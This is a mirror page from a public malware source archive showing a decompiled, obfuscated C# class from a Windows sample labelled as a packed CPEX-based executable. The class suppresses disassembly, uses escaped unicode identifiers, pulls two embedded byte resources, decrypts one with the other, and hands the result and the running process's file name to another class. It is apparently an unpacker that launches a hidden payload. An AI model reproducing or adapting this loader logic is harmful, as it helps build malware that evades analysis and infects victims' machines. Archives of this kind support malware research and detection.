mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
44 lines
1.4 KiB
C#
44 lines
1.4 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: 1
|
|||
|
// Assembly: syncui, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 8C369EE2-0F8E-40F6-BD9C-ED440A7013AE
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5.exe
|
|||
|
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
|
|||
|
[SuppressIldasm]
|
|||
|
internal sealed class \u0031 : \u007C
|
|||
|
{
|
|||
|
public \u0031()
|
|||
|
{
|
|||
|
if (false)
|
|||
|
;
|
|||
|
// ISSUE: explicit constructor call
|
|||
|
base.\u002Ector();
|
|||
|
}
|
|||
|
|
|||
|
public override object \u0040(params object[] _param1)
|
|||
|
{
|
|||
|
if (false)
|
|||
|
;
|
|||
|
\u0026.\u0040 = (\u007C) new \u0030();
|
|||
|
byte[] numArray1 = (byte[]) \u0026.\u0040.\u0040((object) 100);
|
|||
|
byte[] numArray2 = (byte[]) \u0026.\u0040.\u0040((object) 101);
|
|||
|
if (numArray1.Length <= 0 || numArray2.Length <= 0)
|
|||
|
return (object) null;
|
|||
|
\u0026.\u0040 = (\u007C) new \u002B();
|
|||
|
byte[] numArray3 = (byte[]) \u0026.\u0040.\u0040((object) numArray2, (object) numArray1);
|
|||
|
if (numArray3.Length <= 0)
|
|||
|
return (object) null;
|
|||
|
if (_param1.Length <= 0)
|
|||
|
{
|
|||
|
_param1 = new object[1];
|
|||
|
_param1[0] = (object) new string[1];
|
|||
|
}
|
|||
|
\u0026.\u0040 = (\u007C) new \u005E();
|
|||
|
\u0026.\u0040.\u0040((object) numArray3, (object) (string[]) _param1[0], (object) Process.GetCurrentProcess().MainModule.FileName);
|
|||
|
return (object) null;
|
|||
|
}
|
|||
|
}
|